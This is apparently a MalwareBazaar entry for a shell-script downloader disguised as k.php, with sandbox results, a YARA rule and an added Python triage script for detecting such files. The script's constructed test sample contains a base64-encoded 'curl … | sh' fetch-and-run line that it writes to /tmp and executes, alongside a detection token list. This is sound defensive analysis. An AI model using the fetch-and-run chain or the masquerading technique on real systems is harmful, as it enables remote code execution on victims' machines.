MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown
Vendor detections: 7

SHA256 hash: 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f
SHA3-384 hash: 1fa49e29be3173bc9fd7906870575319d1e3f8e78115fa1416ae4cd2f74378b8d3471d2b282cfa4e66288afa8a8b24f7
SHA1 hash: 45e6aac2dc4990599145717785f1be756f738e79
MD5 hash: b345f289e4ca2a61dbd894cfaffa45c8
humanhash: winter-romeo-quiet-spaghetti
File name: k.php
File size: 19,499 bytes
First seen: 2026-03-15 09:16:40 UTC
Last seen: 2026-03-16 08:38:09 UTC
File type: sh
MIME type: text/x-shellscript
ssdeep: 384:NFcuQpWx+BL0SWL0g5zsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:NF8i+BL0SI0OzsP4cbddr7zsP4cbddrk
TLSH: T13E925CB512896C79FBD0CE399F3C7F4DADE8C2C42124A3ACBA4F39215A1166DCB05359
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1); 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh

Intelligence


File Origin
Number of uploads: 2
Number of downloads: 73
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive masquerade

Verdict: Malicious
File type: unix shell
Detections: HEUR:Trojan-Downloader.Shell.Agent.bc
Status: terminated
Behavior Graph (process tree reconstructed from the sandbox graph; pids in brackets, edge type before the arrow):
/usr/bin/sudo [3459]
  execve -> /tmp/sample.bin [3466]
    clone  -> /usr/bin/bash [3468, 3469]
    execve -> /usr/bin/mkdir x7 [3471, 3473, 3475, 3478, 3480, 3482, 3484]
    execve -> /usr/bin/cp x15 [3487, 3490, 3492, 3498-3509]
    execve -> /usr/bin/touch [3510]
    clone  -> /usr/bin/bash [3514, 3515, 3516]
    execve -> /usr/bin/base64 (write-file) [3517]
    execve -> /usr/bin/bash [3520]
      clone  -> /usr/bin/bash [3522, 3523]
      execve -> /usr/bin/ls [3525]
      execve -> /usr/bin/cat [3528]
      execve -> /usr/bin/ls [3530]
      execve -> /usr/bin/mkdir [3532]
      execve -> /usr/bin/mv [3534]
      clone  -> /usr/bin/bash [3536]
      execve -> /usr/bin/base64 (write-file) [3537]
      execve -> /usr/bin/rm (delete-file) [3538]
      execve -> /usr/bin/ls [3539]
      clone  -> /usr/bin/bash [3540]
      execve -> /usr/bin/base64 (write-file) [3541]
      execve -> /usr/bin/ls [3542]
      execve -> /usr/bin/cat [3544]
      execve -> /usr/bin/ls [3545]
    execve -> /usr/bin/rm (delete-file) [3546]
    clone  -> /usr/bin/bash [3548, 3549]
    execve -> /usr/bin/bash [3551]
    execve -> /usr/bin/rm [3553]
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Script-Shell.Trojan.Vigorf
Status: Malicious
First seen: 2026-03-15 09:17:19 UTC
File type: Text (Shell)
AV detection: 12 of 24 (50.00%)
Threat level: 5/5

Result
Malware family: n/a
Score: 4/10
Tags: defense_evasion discovery linux
Behaviour:
  Reads runtime system information
  Writes file to tmp directory
  Deobfuscate/Decode Files or Information

Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These rules are matched against malware samples uploaded to MalwareBazaar and against any suspicious process dumps those samples create in the sandbox. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: SUSP_LNX_Base64_Exec_Apr24
Author: Christian Burkard
Description: Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference: Internal Research
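The two signals this entry records, a shell script served under a .php file name (the "masquerade" tag) and base64 blobs that decode to shell commands (the pattern the rule above targets), can be reproduced with a small triage script. The following is an added example for this page; it is not MalwareBazaar's code and not the YARA rule itself. The extension allow-list, the shell-token heuristics and the sample input are constructed assumptions, and the sample is a stand-in, not the contents of the real k.php.

```python
"""Triage helper for a shell script hiding behind a non-script file name and
carrying base64-encoded commands.  Added example for this page; it is not
MalwareBazaar's code and not the YARA rule above.  The extension allow-list,
the shell-token heuristics and the sample input are constructed assumptions."""
import base64
import binascii
import os
import re

# Assumption: extensions a web server hands out as content, which should never
# begin with a shell shebang.  Extend to taste.
NON_SCRIPT_EXTENSIONS = {".php", ".jpg", ".jpeg", ".png", ".gif", ".txt", ".html", ".css", ".pdf"}

# First-line shebang for sh/bash/dash/zsh/ksh/ash, directly or via env.
SHEBANG_RE = re.compile(rb"\A#!\s*\S*/(?:env\s+)?(?:ba|da|z|k|a)?sh\b")
# Runs of base64 alphabet long enough to hold a command line (40+ chars).
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# Assumption: tokens whose presence in decoded output marks it as shell text.
SHELL_TOKENS = (b"#!/", b"/bin/sh", b"bash", b"curl ", b"wget ", b"chmod ", b"rm -",
                b"mkdir ", b"base64", b"| sh", b"|sh", b"/tmp/", b"eval ", b"nohup ")


def has_shell_shebang(data: bytes) -> bool:
    return SHEBANG_RE.match(data) is not None


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims a non-script type but the body is a shell script."""
    suffix = os.path.splitext(filename)[1].lower()
    return suffix in NON_SCRIPT_EXTENSIONS and has_shell_shebang(data)


def looks_like_shell(decoded: bytes) -> bool:
    """A decoded blob counts as a command only if it is printable text with shell
    tokens.  Hex hashes also decode as base64 (hex digits are in the alphabet)
    but yield binary junk, which this check rejects."""
    if not decoded:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in decoded)
    if printable / len(decoded) < 0.95:
        return False
    return any(tok in decoded for tok in SHELL_TOKENS)


def decode_base64_blobs(data: bytes):
    """Yield (encoded, decoded) for every base64 run that decodes cleanly."""
    for match in B64_RE.finditer(data):
        blob = match.group(0)
        padded = blob + b"=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            yield blob, base64.b64decode(padded, validate=True)
        except binascii.Error:
            continue


def triage(filename: str, data: bytes) -> dict:
    """Combine both signals into one verdict dictionary."""
    findings = []
    if extension_mismatch(filename, data):
        findings.append(f"shell shebang behind a {os.path.splitext(filename)[1]} name")
    decoded_commands = [dec for _, dec in decode_base64_blobs(data) if looks_like_shell(dec)]
    if decoded_commands:
        findings.append(f"{len(decoded_commands)} base64 blob(s) decode to shell commands")
    return {"filename": filename, "suspicious": bool(findings),
            "findings": findings, "decoded": decoded_commands}


# Constructed test input.  This is NOT the contents of the real k.php sample,
# only a stand-in with the same two properties the MalwareBazaar entry records.
INNER_PAYLOAD = b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\nrm -f /tmp/.cache/x\n"
CONSTRUCTED_SAMPLE = (
    b"#!/bin/bash\n"
    b"mkdir -p /tmp/.cache\n"
    # a hash-like hex string decodes as base64 but not to shell text, so it is not flagged
    b"echo 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f > /dev/null\n"
    b"echo " + base64.b64encode(INNER_PAYLOAD) + b" | base64 -d > /tmp/.cache/x\n"
    b"chmod +x /tmp/.cache/x && /tmp/.cache/x\n"
)

if __name__ == "__main__":
    result = triage("k.php", CONSTRUCTED_SAMPLE)
    print("suspicious:", result["suspicious"])
    for line in result["findings"]:
        print(" -", line)
    for cmd in result["decoded"]:
        print("decoded payload:\n" + cmd.decode())
```

Run it on a real file with `triage(path.name, path.read_bytes())`. The printable-ratio check matters in practice: long hex hashes and URL-safe tokens pass the base64 regex and decode without error, so decoding alone would flag nearly every script; requiring readable text with shell tokens keeps the signal tied to what the YARA rule is after.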

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download: sh 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f (this sample)
Delivery method: Distributed via web download